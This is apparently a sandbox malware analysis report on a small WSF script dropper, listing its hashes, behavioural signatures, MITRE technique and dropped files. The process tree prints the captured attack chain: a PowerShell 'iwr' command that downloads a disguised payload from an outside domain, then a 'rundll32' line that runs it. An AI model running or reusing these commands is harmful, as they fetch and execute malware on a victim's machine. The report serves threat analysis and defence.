ed629c9a335237d8a94f81f7dc656d6d5d4a4214ab007b824c8211f8cdb2b57d

Analysis

max time kernel
371s
max time network
434s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
16/02/2023, 02:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e.wsf
Size

1KB
MD5

6705aa10e4a17025c901675927ed47de
SHA1

b82ce2a7841262cc5fbab26d284de7715b358b3c
SHA256

ed629c9a335237d8a94f81f7dc656d6d5d4a4214ab007b824c8211f8cdb2b57d
SHA512

ea5991609115e47c6593aeecfa31ae76aea877b17ff64419d1e0ee681b5371d0d603aeecada9c148ea8be3c7d27f811787f717a863518eb2d5c5902949ec13f2

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	3660	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3660	powershell.exe
3716	powershell.exe
3716	powershell.exe
3660	powershell.exe
3716	powershell.exe
3660	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3660	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2108 wrote to memory of 4768	2108	WScript.exe	66
PID 2108 wrote to memory of 4768	2108	WScript.exe	66
PID 4768 wrote to memory of 3660	4768	cmd.exe	68
PID 4768 wrote to memory of 3660	4768	cmd.exe	68
PID 4768 wrote to memory of 3716	4768	cmd.exe	69
PID 4768 wrote to memory of 3716	4768	cmd.exe	69
PID 3716 wrote to memory of 776	3716	powershell.exe	72
PID 3716 wrote to memory of 776	3716	powershell.exe	72

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e.wsf"
1⤵
- Suspicious use of WriteProcessMemory
PID:2108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\r.cmd" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4768
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    poweRshell -C iwr 'http://baracundofres.com/images/150223.gif' -OutFile 'rei.dat'
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3660
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    poweRshell -C Start-Sleep 11;rundll32 rei.dat,Wind
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3716
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" rei.dat,Wind
      4⤵
      PID:776

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6ad58398773e11c54573a2db26880f8a

SHA1
2f6df8a802f7fe080bbdd32713681ddd6613c1bf

SHA256
97136545a894944a250fb9db6525bcdd12cdb3e40d4184aa0b947354a390a6e3

SHA512
78389c133c1a765d4a16562a50de5480f52f71d26c5c06d1248353bb8129cc0899af6618bed2dfc4de8d8697b3cd6fcb08962ce4997d09142dac36465c6c6d7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\r.cmd

Filesize
867B

MD5
9919a2abbdb53145c8c3ef6daa7a1676

SHA1
053ddaa2c16ad4406946a512a2d3f810a14d5aa7

SHA256
d760b90bf3e666d6614b2da14b1b8de6a88e64c8506c287f579d5a10a4fa9d1d

SHA512
1f1b04dacd6011414abc2db525a28368ec66ca0a7ccf168cbaf867bf3831744c983320479609bb153e2108a8df84891f5823ff3db727d395b9f6fb8bf2a06305

Download Submit
C:\Users\Admin\AppData\Local\Temp\rei.dat

Filesize
83B

MD5
080e240e1b54ff9c77e558e6e4cfc95c

SHA1
7ddec98966ae0734f743f319c37586d33294d8cb

SHA256
2915fa731488fc4e621302923c06e6ca01dddd93da68948d14a16764214b08c8

SHA512
cf2d1ea1f20d4f0a4fde0373495523a03a25f2c8babaafed0d218c9e9e9f38d8a12ce5b37e2428028386b416404a215c5d23e9f21c2447dabc5930835030cd77

Download Submit
memory/3660-132-0x0000019109D20000-0x0000019109D42000-memory.dmp

Filesize
136KB

Download
memory/3716-137-0x000001D263170000-0x000001D2631E6000-memory.dmp

Filesize
472KB

Download